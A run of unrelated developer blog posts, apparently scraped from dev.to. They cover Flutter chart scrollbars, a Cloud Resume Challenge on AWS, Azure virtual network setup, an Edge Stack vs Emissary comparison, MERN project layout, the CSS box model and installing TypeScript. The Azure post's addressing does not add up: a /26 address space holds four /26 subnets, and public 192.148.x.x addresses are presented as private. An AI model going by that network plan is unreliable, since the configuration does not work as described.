[SfRangeSlider](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSlider-class.html "SfRangeSlider class for Flutter") using the **SfRangeSliderTheme**. Similar to the x-axis scrollbar, position the scrollbar on the y-axis. Obtain the series size using a custom series renderer and position the vertical [SfRangeSlider](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSlider-class.html "SfRangeSlider class for Flutter"), stretching its height to the entire axis height. If the y-axis is placed on the left by default, we can simply position the scrollbar at [Offset.zero](https://api.flutter.dev/flutter/dart-ui/Offset/zero-constant.html "Offset.zero property for Flutter"). If it is positioned on the right side (the opposite position is true), we should get the series size and reposition it through the [postFrameCallback](https://api.flutter.dev/flutter/scheduler/SchedulerBinding/addPostFrameCallback.html "addPostFrameCallback method for Flutter"). Refer to the following code example. ```csharp void _updateScrollBarSize(Size size) { SchedulerBinding.instance.addPostFrameCallback((Duration timeStamp) { if (size != _scrollbarSize) { setState(() { _scrollbarSize = size; _verticalScrollbarStart = Offset(size.width, size.height); }); } }); } SfCartesianChart( ... annotations: [ CartesianChartAnnotation( x: _verticalScrollbarStart.dx, y: _verticalScrollbarStart.dy, coordinateUnit: CoordinateUnit.logicalPixel, verticalAlignment: ChartAlignment.far, widget: SizedBox( width: 6, // Max size from the active and inactive track. height: _scrollbarSize.height, child: SfRangeSliderTheme( data: const SfRangeSliderThemeData( thumbRadius: 0, overlayRadius: 0, ), child: SfRangeSlider.vertical( min: 0, max: 1, values: values, ... ), ), ), ), ], ) ``` The [SfRangeSlider](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSlider-class.html "SfRangeSlider class for Flutter") will be updated only when the widget rebuilds with new values. Therefore, wrap it in a [ValueListenableBuilder](https://api.flutter.dev/flutter/widgets/ValueListenableBuilder-class.html "ValueListenableBuilder<T> class for Flutter") and update the listenable value in the chart’s [onActualRangeChanged](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/SfCartesianChart/onActualRangeChanged.html "onActualRangeChanged property for Flutter") callback by converting the visible range values into a range from 0 to 1. When changing the listenable value, the [ValueListenableBuilder](https://api.flutter.dev/flutter/widgets/ValueListenableBuilder-class.html "ValueListenableBuilder<T> class for Flutter") rebuilds its child using the [builder](https://api.flutter.dev/flutter/widgets/ValueListenableBuilder/builder.html "builder property for Flutter") callback. Within this callback, use the new range values that were updated in the [onActualRangeChanged](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/SfCartesianChart/onActualRangeChanged.html "onActualRangeChanged property for Flutter") callback. This will ensure that the [SfRangeSlider](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSlider-class.html "SfRangeSlider class for Flutter") is updated to reflect the new visible range. ```csharp late num _yAxisActualMin; late num _yAxisActualMax; SfCartesianChart( ... onActualRangeChanged: (ActualRangeChangedArgs args) { if (args.axisName == 'primaryYAxis') { _yAxisActualMin = args.actualMin; _yAxisActualMax = args.actualMax; SchedulerBinding.instance.addPostFrameCallback((Duration timeStamp) { final num actualRange = args.actualMax - args.actualMin; double visibleMinNormalized = (args.visibleMin - args.actualMin) / actualRange; double visibleMaxNormalized = (args.visibleMax - args.actualMin) / actualRange; _yScrollbarSelectedValues.value = SfRangeValues(visibleMinNormalized, visibleMaxNormalized); }); } }, annotations: [ CartesianChartAnnotation( ... widget: SizedBox( width: 6, height: _scrollbarSize.height, child: ValueListenableBuilder<SfRangeValues>( valueListenable: _yScrollbarSelectedValues, builder: (BuildContext context, SfRangeValues values, Widget? child) { return SfRangeSliderTheme( ... child: SfRangeSlider.vertical( min: 0, max: 1, values: values, ... ), ); }, ), ), ), ], ) ``` That’s it. Now, the y-axis scrollbar will be updated whenever the y-axis range changes through chart interactions or direct APIs. One more thing: if you need to update the chart range when dragging and updating the y-axis scrollbar (range slider), convert the [onChanged](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSlider/onChanged.html "onChanged property for Flutter") new values to actual values and update them to the chart axis controller’s visible min and max properties. ```csharp late NumericAxisController _yAxisController; SfCartesianChart( ... primaryYAxis: NumericAxis( ... onRendererCreated: (NumericAxisController controller) { _yAxisController = controller; }, ), ) SfRangeSlider.vertical( min: 0, max: 1, values: values, onChanged: (SfRangeValues newValues) { _yAxisController.visibleMinimum = lerpDouble( _yAxisActualMin, _yAxisActualMax, newValues.start); _yAxisController.visibleMaximum = lerpDouble( _yAxisActualMin, _yAxisActualMax, newValues.end); }, ) ``` Refer to the following image. <figure> <img src="https://www.syncfusion.com/blogs/wp-content/uploads/2024/07/Adding-scrollbars-to-the-X-and-Y-axes-of-the-Flutter-Charts-widget.gif" alt="Adding scrollbars to the X and Y-axes of the Flutter Charts widget" style="width:100%"> <figcaption>Adding scrollbars to the X and Y-axes of the Flutter Charts widget</figcaption> </figure> ## GitHub reference For more details, refer to [adding scrollbars in the Flutter Charts GitHub demo](https://github.com/SyncfusionExamples/flutter_scrollbar_chart "Adding scrollbars in the Flutter Charts GitHub demo"). ## Conclusion Thanks for reading! In this blog, we learned how to add and synchronize scrollbars in the Syncfusion [Flutter Charts](https://www.syncfusion.com/flutter-widgets/flutter-charts "Flutter Charts") widget. With this, you can seamlessly zoom and pan in the charts to view the data points in detail and get insights. Give it a try, and leave your feedback in the comment section below. Check out other features of our Flutter Charts and Sliders in the [user guide](https://help.syncfusion.com/flutter/ "Syncfusion Flutter widgets - API reference") and explore our [Flutter Charts and Sliders widget samples](https://github.com/syncfusion/flutter-examples "Syncfusion Flutter demos on GitHub"). Additionally, check out our demo apps available on different platforms: [Android](https://play.google.com/store/apps/details?id=com.syncfusion.flutter.examples "Syncfusion Flutter UI Widgets on Google Play Store"), [iOS](https://apps.apple.com/us/app/syncfusion-flutter-ui-widgets/id1475231341 "Syncfusion Flutter UI Widgets on App Store"), [web](https://flutter.syncfusion.com/?_ga=2.113248516.2088510317.1618203864-1079363253.1592211341 "Syncfusion Flutter UI Widgets Web"), [Windows](https://www.microsoft.com/store/productId/9NHNBWCSF85D "Syncfusion Flutter UI Widgets on Microsoft Store"), and [Linux](https://snapcraft.io/syncfusion-flutter-gallery "Syncfusion Flutter Gallery on Snapcraft"). If you need a new widget for the Flutter framework or new features in our existing widgets, you can contact us through our [support forums](https://www.syncfusion.com/forums "Syncfusion Support Forum"), [support portal](https://www.syncfusion.com/support/directtrac/incidents "Syncfusion Support Portal"), or [feedback portal](https://www.syncfusion.com/feedback/flutter "Syncfusion Feedback Portal"). As always, we are happy to assist you! ## Related blogs - [Introducing the New ROC and WMA Indicators in Flutter Charts](https://www.syncfusion.com/blogs/post/roc-and-wma-indicators-flutter-charts "Blog: Introducing the New ROC and WMA Indicators in Flutter Charts") - [What’s New in Flutter: 2024 Volume 2](https://www.syncfusion.com/blogs/post/whats-new-flutter-2024-volume-2 "Blog: What’s New in Flutter: 2024 Volume 2") - [Syncfusion Essential Studio 2024 Volume 2 Is Here!](https://www.syncfusion.com/blogs/post/syncfusion-essential-studio-2024-vol2 "Blog: Syncfusion Essential Studio 2024 Volume 2 Is Here!") - [Open and Save PDF Files Locally in Flutter](https://www.syncfusion.com/blogs/post/open-save-pdf-locally-flutter "Blog: Open and Save PDF Files Locally in Flutter")
jollenmoyani
1,921,266
My Cloud Resume Challenge
Here's my shot at the Cloud Resume Challenge...
0
2024-07-15T14:13:46
https://dev.to/anthony_coughlin_f0ae1698/my-cloud-resume-challenge-j4p
Here's my shot at the Cloud Resume Challenge https://cloudresumechallenge.dev/docs/the-challenge/aws/ I managed to complete the challenge after 2 weeks, well, if I'm completely honest I did not take the AWS Cloud Practitioner certification but plan to get that in the future. I'm a QA Manager by trade, but have got quite a bit of Cloud Experience mainly with Azure. It would have been much easier to just do the challenge with Azure but the whole purpose of the challenge is to learn, so I opted for AWS. One of the questions I continually see asked on forums related to this challenge is the cloud cost, at the time of writing here's what I've spent in total: Domain Purchase - $17.34 AWS Route 53 - $0.51 AWS Storage - $0.003 AWS API Gateway - $0.001 Total - $17.86 I would expect depending on traffic the costs here will increase, but I’ve in main taken advantage of the AWS free tier as much as possible. My frugality has its drawbacks, the visitor count API doesn't refresh the visitor data as quickly as I would have hoped also, cost is a factor here but it's an acceptable trade off. Below is the blurb listing the tools, technologies etc. ## Github https://github.com/antowaddle/cloud-resume-sam-template ## Live Site https://anthony-coughlin-resume.com/ --- ## Introduction The Cloud Resume Challenge encourages participants to build a serverless web application on AWS, focusing on practical AWS skills and modern web development techniques. This challenge is an opportunity to showcase expertise in AWS services and enhance one's portfolio with a real-world project. --- ## Technologies Required <details> | Technology | Description | |--------------------|------------------------------------------------------------------| | AWS S3 | Static website hosting | | AWS API Gateway | Create RESTful APIs | | AWS Lambda | Serverless compute | | AWS DynamoDB | NoSQL database | | AWS CloudFormation | Infrastructure as code | | AWS IAM | Identity and Access Management | | AWS CodePipeline | Continuous integration and continuous delivery pipeline | | AWS SAM | Serverless Application Model | | HTML/CSS | Frontend development | | JavaScript | Frontend and backend development | | Python | APIs and Tests | | YAML | Infrastructure as code (CloudFormation and SAM templates) | | Terraform | Infrastructure as code | </details> ## Architecture Diagram ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tmshkvlpdmxuy0x7zh4j.png) ## Points of the Challenge <details> 1. **Create a static resume website**: Host your resume as a static website on AWS S3. ✅ I used Amazon S3 Static Website, relatively easy to get setup and deploy with AWS SAM. 2. **Use AWS Lambda**: Implement Lambda functions to handle backend tasks, such as contact form submissions. ✅ The lambda function code for the Get and Put requests were written in Python. 3. **Utilize AWS API Gateway**: Create APIs to interact with Lambda functions. ✅ As per the above, the APIs accept requests from the web app and communicates with the DB. 4. **Integrate DynamoDB**: Store and retrieve data using DynamoDB, such as visitor statistics. ✅ I switched to using Terraform to deploy my Dynamo DB table. 5. **Implement AWS CloudFormation**: Define your AWS infrastructure as code for reproducibility. ✅ Managed by AWS SAM, stack(s) created and resources defined within. 6. **Set up IAM roles**: Manage permissions and security using IAM roles and policies. ✅ A specific user that will remain nameless was setup to configure all the resources. 7. **Implement CI/CD pipeline**: Use GitHub Actions for automated deployment and updates. ✅ I created a pipeline using GitHub actions with stages to test, deploy infra, deploy site and then retest (using playwright) 8. **Design frontend**: Develop a responsive frontend using HTML, CSS, and JavaScript. ✅ I'm no Front End Guru, so kept it relatively simple. 11. **Version control**: Use Git for version control and collaborate via GitHub or another repository. ✅ Does anyone use anything other than GitHub these days? 12. **Optimize for cost**: Implement cost-effective solutions, utilizing AWS free tier resources where possible. ✅ 13. **Testing**: Conduct testing to ensure functionality and performance. Unit and UI tests added using Playwright. ✅ 15. **Deploy publicly accessible site**: Ensure your resume website is publicly accessible and optimized for performance. ✅ ## Challenges Here’s a few things I struggled with: 1. AWS Sam - I encountered several gotchas while using AWS Sam. I ended up switching to using Terraform to deploy the DB. In hindsight I would should have used terraform from the start. 2. Certificates - I unfortunately created a cert in the wrong region and it had to be deleted. It was very challenging to recreate the cert and associate it with the domain. Be careful with how you create certs and don’t delete them! 3. DynamoDB- it’s plug and play, right? Yes, technically true and great when things go right. Unfortunately for me the table was not getting updated through my put command, I had to do quite a bit of reading in order to get things in order </details> ## Conclusion So overall that is it, in terms of time it took me probably around 2 weeks and several hours of tearing my hair out to complete. The journey was bumpy, not to manage that we’ve got a new born and 2 year old at home which didn’t make things easy. This is an excellent challenge, throw yourself in, make mistakes, feel good, feel stupid and most important learn. ---
anthony_coughlin_f0ae1698
1,921,304
Creating An Azure virtual Network with Subnets
Outline Step 1: Introduction Step 2: Log in to Azure Portal Step 3: Create a Virtual Network Step 4:...
0
2024-07-12T20:55:01
https://dev.to/mabis12/creating-azure-virtual-network-with-subnets-1ei0
networking, azure, virtualsubnets, cloudcomputing
**Outline** Step 1: Introduction Step 2: Log in to Azure Portal Step 3: Create a Virtual Network Step 4: Configure the Basics Tab Step 5: Configure IP Addresses Tab Step 6: Configure Subnet Step 7: Create Virtual Network Step 8: Verification of Azure Virtual Network with subnets **Step 1: Introduction** An Azure Virtual Network (VNet) is a network or environment that can be used to run VMs and applications in the cloud. When it is created, the services and Virtual Machines within the Azure network interact securely with each other. **Virtual network concepts** - **Address space:** When creating a virtual network, you must specify a custom private IP address space using public and private (RFC 1918) addresses. Azure assigns resources in a virtual network a private IP address from the address space that you assign. For example, if you deploy a VM in a virtual network with address space, 10.0.0.0/16, the VM is assigned a private IP like 10.0.0.4. **- Subnets:** Subnets enable you to segment the virtual network into one or more subnetworks and allocate a portion of the virtual network's address space to each subnet. You can then deploy Azure resources in a specific subnet. Just like in a traditional network, subnets allow you to segment your virtual network address space into segments that are appropriate for the organization's internal network. Segmentation improves address allocation efficiency. You can secure resources within subnets using Network Security Groups. **Step 2: Log in to Azure Portal** Go to Azure Portal and log in with your Azure account credentials. **Step 3: Create a Virtual Network** - In the "Search the Marketplace box", type "Virtual Network" and select it from the results. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/020ax37d2o7l4wxm2wby.png) - Click "Create" to start the Virtual Network creation process. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/k68tbd1dofvkukpin91x.png) **Step 4: Configure the Basics Tab** - Subscription: Choose your Azure subscription. - Resource Group : Create or select an existing resource group or create a new one. - Name: Enter a name for your virtual network. - Region: Choose the Azure region where you want to create the VNet. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/l21zt4stoigd2q6ya6r3.png) **Step 5: Configure IP Addresses Tab** - Enter the address space for your VNet, such as 192.148.30.0/26. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i62rt62myrj3943uz4mh.png) - Click "+ Subnet" to add a new subnet. **Step 6: Configure Subnet** - Name: Enter a name for your subnet. - Address range (CIDR block): Enter the address range for the subnet, such as 192.148.30.0/26. - Click "Add" to create the subnet. - Repeat the above steps to create additional subnets within the same VNet, adjusting the address ranges accordingly. Subnet1: 192.148.30.0 - 192.148.30.63 Subnet2: 192.148.30.64 - 192.148.30.127 Subnet3: 192.148.30.128 - 192.148.30.191 Subnet4: 192.148.30.192 - 192.148.30.255 ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/oeyrzi4cuqpi55vsjf15.png) - Security Tab (Optional): Configure network security options such as DDoS Protection and Firewall. - Tags Tab (Optional): Add tags to your VNet for better organization. - Review + Create Tab: Review your configuration and click "Create" to deploy the VNet. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jjdl90k87a0mco7ofk5a.png) **Step 7: Create Virtual Network** - Click on Create ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4fhafbflo42cum970wx1.png) \ ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wys3vl5t8lbe8kc89ji5.png) **Step 8: Verification of Azure Virtual Network with subnets** - Go to the "Virtual networks" section in the Azure portal. - Select the newly created VNet. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tcoy83iwzo33bjdjjii3.png) - Verify that the VNet and its subnets are listed with the correct configurations. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rbn6vo859s8s1d6h6ego.png)
mabis12
1,921,356
Differences Between Edge Stack and Emissary: A Breakdown
One of our new segments, Community Corner, features weekly deep dives into common questions we get in...
0
2024-07-15T06:00:00
https://www.getambassador.io/blog/differences-edge-stack-emissary
edge, apigateway, emissary, api
One of our new segments, Community Corner, features weekly deep dives into common questions we get in our Community across our products: [Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway), [Telepresence](https://www.getambassador.io/products/telepresence), and [Blackbird](https://www.getambassador.io/www-getambassador-io/products/blackbird/api-development). As one of the core members of our customer team, one of the most common questions I see revolves around the key differences between our open-source offering, Emissary-Ingress, and our commercial product, [Edge Stack API Gateway.](https://www.getambassador.io/products/edge-stack/api-gateway) [Watch Instead of Read](https://youtu.be/P8YvoQ_P4-M?si=rfDOWuWw_sALnP0t) **The TL/DR:** [Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway) is Ambassador’s licensed API Gateway. It’s a closed-source product that has been adopted by companies in various industries around the world to manage traffic to their cloud-based services. Emissary-Ingress is an open-source gateway project developed by Ambassador. A fun fact: originally, Emissary went by our company name (Ambassador), but when we donated it to the CNCF, we changed the name to Emissary-Ingress. ## Similarities Both[ Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway) and Emissary-Ingress are built on Envoy and use Envoy Proxy as their core proxy. For those who want a refresher, Envoy is an open-source, high-performance proxy originally written by Lyft (the rideshare company). In both Edge Stack and Emissary-Ingress, you can configure Envoy more easily. Additionally, architecturally speaking, [Edge Stack ](https://www.getambassador.io/products/edge-stack/api-gateway)and Emissary-Ingress are both ideally suited for Kuberentes-based environments where you want to route external traffic to your microservices. ## Differences: There are three distinct areas where Emissary and Edge Stack differ (other than the obvious- open source v.s a paid product). The main differences you’ll notice relate to the release schedules, regular maintenance, the feature set, and of course, continued support. ## Release Schedule and Maintenance As Ambassador’s licensed API Gateway, [Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway) is maintained and regularly updated by Ambassador’s in-house engineering teams. Edge Stack releases are made regularly for bug fixes, efficiency improvements, and enhancements. Our latest release, as of June 2024, was Version 3.11.0. For example, when it comes to Common Vulnerabilities and Exposures (CVEs) and security-impacting issues, we have a process for evaluating whether these issues impact Edge Stack’s functionality and performance. If there are impacts, we implement a fix for Edge Stack in a minor version release. Occasionally, customers and users will ask about a particular CVE and we share with them our evaluation results. With Edge Stack, you can expect regular support, maintenance, and protection against vulnerabilities to avoid disruption in your workflow. Emissary-ingress, on the other hand, does not have a determined release schedule currently. In late 2023, Ambassador made the choice to decouple the Emissary release schedule from Edge Stack’s schedule, and we moved the Emissary Slack Community over to the CNCF Community. Ambassador no longer serves as the primary maintainer of Emissary but works alongside other active community maintainers on the project. This change was in response to several things, including requests from CNCF, marketplace factors, and, most importantly, efforts to recenter our focus on the needs of our Edge Stack customers and our new API development tool, Blackbird. Although we do still merge PRs for CVEs that impact Emissary, we’re not planning for any future releases. Emissary-ingress has always been a community project, and the release schedule going forward will depend on the maintainers collectively. The last release of Emissary-ingress was 3.9.1 in November 2023. ## Different Feature Sets [Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway) Edge Stack leverages key features in Envoy (service discovery, authorization, authentication, circuit breaking, retries, timeouts, logging, and distributed tracing) and makes them available and more easily configurable. As an API Gateway, [Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway)’s primary job is to route traffic securely to your services, and it does this through declarative Custom Resource Definitions, which are highly configurable. So you can determine how you want Edge Stack to listen for your traffic, what ports you want it to use, the granularity of your routes, and a host of other factors to fine-tune access to your services and service availability. Edge Stack is highly scalable as well which means it performs in high-demand, high-load environments better than many other gateways not built on Envoy. And you can employ both horizontal and vertical scaling strategies. ## Some of the key features of Edge Stack include: - Authentication: OAuth2, OIDC, JWT, and Single Sign On - Rate Limiting - Web Application Firewall solution (WAF): configured to help protect your web applications by preventing and mitigating many common attacks. - Network Security With Cert-Manager Integration: TLS, mTLS and CORS Request Resiliency Observability ## Emissary Features On the other end, Emissary offers the following: - Circuit breakers, automatic retries, timeouts Observability: distributed tracing, real-time L7 metrics - L4/L7 load balancing and routing for your traffic protocols. You’ll note that Emissary doesn’t include authentication, rate limiting, WAF, Single-sign on, or Network Security With Cert-Manager Integration so adopters would need to implement these features independently or build them internally. In the end, Emissary-ingress is really more of an ingress with limited functionality, like the name suggests, whereas Edge Stack has the full feature set that provides everything you need at the edge in a fully fledged API Gateway. ## Continued Support The final difference between the two, and critical in a business-focused production environment, is that [Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway) is fully supported by Ambassador’s knowledgeable and reputable Support team. Support is available on a 5 x 8 or 24 x 7 basis, depending on your needs. Users can raise tickets and get speedy responses and assistance. Users can also join our Slack channel, where we discuss implementation topics and new releases and keep everyone up to date with the latest versions, updates, and news. Customers can also employ our new Knowledge Base. Hosted on our Support Portal, the Knowledge Base is a self-service collection of technical articles, FAQs, and best practices written by our Support team. As it dives deeper into custom use cases and configuration details based on user questions, it's meant to be a resource on various implementation topics in addition to our formal docs. On the other hand, since its inception, Emissary-ingress has been a community project, and going forward, it will be supported by the community on a peer-to-peer basis and by the maintainers collectively. There is a wide-reaching Emissary community and knowledge sharing among its members in the CNCF Slack channel and on GitHub. You can join that community via CNCF Slack here. ## Which Should I Choose? Now this might sound biased coming from the Ambassador team, but if you want the most actively supported, feature-rich, scalable, and configurable API Gateway option, [Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway) is the obvious choice. If price is your barrier, we do offer a free tier to test out all the proprietary features, such as authentication, Single Sign-On, and rate limiting as a trial with 10,000 requests per Month (RPMs). Our Growth plan option is also great for small teams and low-volume users, starting at only $1,000 a month. [Learn more about Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway). And thank you for joining us on this community corner deep dive!
getambassador2024
1,921,374
How to optimize your MERN workflow with a solid architecture
We've probably encountered a MERN stack project on the internet that was perhaps the messiest thing...
0
2024-07-12T20:06:41
https://dev.to/fullstackdev/optimize-your-mern-workflow-with-a-solid-architecture-37p4
webdev, javascript, programming, architecture
We've probably encountered a MERN stack project on the internet that was perhaps the messiest thing we've seen. Where everything was crammed into one single file. Where the front-end and back-end logic were squeezed together, files and variables have random names, making the codebase hard to explore and no error handling whatsoever. This is why a strong foundation has to be created before developing a MERN stack application or **any other type of application for that matter**. A disorganized project structure can easily turn an app into a mess. With a proper template, you can develop an application that is functional, scalable, manageable, and easy to work with. Following standard practices can considerably improve the developer experience and code quality. Let's dive right in. ## Principles of project structure Before we go into these principles, here are some best practices you should follow to improve code readability and make your project easier to maintain. ### Best practices 1. Data management is the proper handling of data flow and status. 2. Use Linting and formatting tools to enforce code standards. 3. Use version control like Git and Bitbucket to manage your code. 4. implement unit tests to be able to find issues early on prevent unpredictable behavior from your code and ensure code stability 5. Error management requires putting in place robust error-handling procedures. ### Separation of concerns Separation of concerns or SoC, is an essential concept in programming that recommends breaking down a huge system into smaller, more manageable components, each with a role. Such as separating the Front-end from the Back-end. ### Organization Creating a directory structure with consistent naming convention. Component-based architecture requires breaking down the user interface into reusable components. Routing includes setting up effective navigation within the app. ## Project architecture This is how our project architecture should look. ``` project-name/ ├── client/ │ ├── public/ │ │ ├── index.html │ │ └── assets/ │ ├── src/ | │ ├── services/ │ │ ├── components/ │ │ ├── pages/ │ │ └── App.js │ └── index.js ├── server/ │ ├── controllers/ │ ├── models/ │ ├── routes/ │ ├── middleware/ │ └── index.js ├── package.json ├── .env └── README.md ```` Let's talk about each folder and file in our structure and their role. **Project Root** - **package.json**: Contains information about the project, its dependencies, and scripts for running the application. - **.env**: contains environment variables like API keys and other information. - **README.md**: is the project documentation. **Client Directory (frontend)** ### public - **index.html**: The main HTML file for the application. - **assets**: Folder that can contain images, fonts, and other static resources. ### src - **services**: For making HTTP requests to the backend using Axios or Fetch. - **components**: Reusable components. - **pages**: Main views or screens of the application. - **App.js**: The main entry point for the React application. - **index.js**: The entry point for the client-side build process. **Server Directory (backend)** ### controllers - Contains logic for handling incoming HTTP requests and responding to them. ### models - Defines the data structures (schemas) for the database. ### routes - Defines the API endpoints and maps them to controller functions. ### middleware - Contains functions that process requests before they reach the controllers ( like error handling). - **index.js**: The entry point for the Node.js server, typically responsible for setting up the Express app, database connections, and route handlers. This architecture is **MVC** (Model-View-Controller) on the backend and **component-based** architecture on the frontend. The MVC architecture has a clear division, the three components are interconnected and each is responsible for a different aspect of the application making it easier to maintain.
fullstackdev
1,921,396
What's In The Box?
Welcome back! We’re diving into the CSS Box-Model, a rite of passage for any web developer. Let’s...
27,613
2024-07-15T14:00:00
https://dev.to/nmiller15/whats-in-the-box-4nh0
html, css, webdev, beginners
![Se7en, What's in the Box?](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3d4p6dm7lqnuskp1rihb.gif) Welcome back! We’re diving into the CSS Box-Model, a rite of passage for any web developer. Let’s see: "What's in the Box!?" --- ## The Content Box In web styling, **everything is in a box**. So far, we’ve only changed text sizes and colors. Now, we’ll explore positioning elements on a page with the CSS Box Model. It includes four parts: content, padding, border, and margin. The content box tightly wraps your content, whether text, images, or other elements. For example, consider this example web page: ![Example Web Page](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/a9ci5x86338athqwguxa.jpg) Here, the "Join the ride!" text is an `<h1>` element. The content box of that element looks like it wraps tightly around the text: ![Content Box Highlight](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9zi3fujfwt63nu8lhdfw.jpg) Notice the space around it? These spaces are controlled by the box model. Without it, everything would stack in the top left corner, like this: ![Top and Left Style](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6z68qscb4hxd4su3tnu6.jpg) The box model makes our pages interesting! ## Padding, Border, and Margin The rest of the box model: ![Padding, Margin, and Border](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pefyl19i94rt9kckwzna.jpg) **Padding:** - Between the content box and the border - Increases element size, combining with the content box for background properties **Border:** - The element’s edge, which can be styled **Margin:** - The space between elements, like an invisible pole pushing them apart ## Moving Things Around Understanding the box model is crucial for positioning elements. To save you some trial and error: - **To move the element:** change its margins. - **To move the content inside the element:** change its padding. --- ## The Code Let’s create our page: ```html <!DOCTYPE html> <html> <head><!-- Metadata and linking --></head> <body> <h1>Join the ride!</h1> <p>A new model, each week!</p> </body> </html> ``` ```css h1 { /* Text Styles */ margin: auto; margin-top: 60px; padding: 12px; } p { /* Text Styles */ margin: auto; margin-top: 6px; padding: 3px; } ``` Here’s the scoop: - `margin` and `padding` control spacing. They’re actually shorthand properties that include the properties `maring-top`, `margin-right`, `margin-bottom`, and `margin-left`. You can keep the same format `padding`'s properties as well. Using one property, we can set the padding size on all edges of the element: ```css p { padding: 12px 50px 100px 2px; /* top right bottom left */ } ``` Or we can set the top/bottom and the left/right to be symmetrical by setting only two values: ```css p { padding: 12px 50px; /* top/bottom left/right */ } ``` Or set all the sides the same, by using one: ```css p { padding: 12px; /* all sides */ } ``` Both `padding` and `margin` can use distance values (`px`, `em`) or percentages (`%`). The `auto` keyword is also handy in conjunction with `margin` for centering elements! --- ## Challenge Time to test your skills! 1. Put four elements on a web page. Keep them roughly the same size. 2. Add borders around them (check [MDN](https://developer.mozilla.org/en-US/) for border styling). 3. Center one element. 4. Make another element’s border larger than its content. You’ve got the tools—now go position your elements like a pro! --- For a much more robust look at the box model, check out [MDN's Documentation](https://developer.mozilla.org/en-US/docs/Learn/CSS/Building_blocks/The_box_model)!
nmiller15
1,921,397
How to Install TypeScript and write your first program
TypeScript has become a popular choice for many developers due to its strong typing and excellent...
28,050
2024-07-13T06:05:00
https://dev.to/jakaria/how-to-install-typescript-and-write-your-first-program-1fj4
webdev, typescript, programming, learning
TypeScript has become a popular choice for many developers due to its strong typing and excellent tooling support. In this guide, we'll walk you through installing TypeScript and writing your first TypeScript program. #### Step 1: Install Node.js and npm Before installing TypeScript, you need to have Node.js and npm (Node Package Manager) installed. You can download and install them from the [official Node.js website](https://nodejs.org/). To check if Node.js and npm are installed, open your terminal and run: ```bash node -v npm -v ``` You should see the version numbers for both Node.js and npm. #### Step 2: Install TypeScript Once Node.js and npm are installed, you can install TypeScript globally using npm. Open your terminal and run: ```bash npm install -g typescript ``` This command installs TypeScript globally on your machine, allowing you to use the `tsc` command to compile TypeScript files. To verify the installation, run: ```bash tsc -v ``` You should see the TypeScript version number. #### Step 3: Create Your First TypeScript Program 1. **Create a New Directory**: Create a new directory for your TypeScript project and navigate into it: ```bash mkdir my-typescript-project cd my-typescript-project ``` 2. **Initialize a New Node.js Project**: Initialize a new Node.js project to create a `package.json` file: ```bash npm init -y ``` 3. **Create a TypeScript File**: Create a new file named `index.ts` manually or run this command: ```bash touch index.ts ``` 4. **Write Your First TypeScript Code**: Open `index.ts` in your preferred text editor and add the following code: ```typescript const welcome:string= "Hello World!" ``` #### Step 4: Compile TypeScript to JavaScript To compile your TypeScript code to JavaScript, use the TypeScript compiler (`tsc`). In your terminal, run: ```bash tsc index.ts ``` This command generates a `index.js` file in the same directory. #### Step 5: Run the Compiled JavaScript Now, you can run the compiled JavaScript file using Node.js: ```bash node index.js ``` You should see the output: ``` Hello, World! ``` Follow these steps to set up TypeScript, configure file paths, and write your first TypeScript program. 1. **Create a TypeScript Configuration File** - Create a `tsconfig.json` file by running: ```bash tsc --init ``` - This command generates a `tsconfig.json` file. 2. **Configure File Paths** - Open the `tsconfig.json` file and set the `rootDir` and `outDir` options: ```json { "compilerOptions": { "rootDir": "./module/src", "outDir": "./module/dist" } } ``` 3. **Create a TypeScript File** - Create a file named `hello.ts` inside the `module/src` directory and add the following code: ```typescript const welcome: string = "Hello World!"; console.log(welcome); ``` 4. **Compile TypeScript to JavaScript** - To convert the TypeScript code to JavaScript, run: ```bash tsc ``` - This will generate a `hello.js` file inside the `module/dist` directory. 5. **Run the Compiled JavaScript File** - Use Node.js to run the compiled JavaScript file: ```bash node module/dist/hello.js ``` - You should see the output: ``` Hello, World! ``` By following these steps, you've successfully installed TypeScript, configured file paths, and written and executed your first TypeScript program.
jakaria
1,921,400
Once You Touch It, You Own It!
While working for my last client, we needed to extend an existing feature. We had to import an Excel...
27,567
2024-07-15T05:00:00
https://canro91.github.io/2024/02/05/LessonsOnAFinishedProject/
career, softwareengineering, beginners, projectmanagement
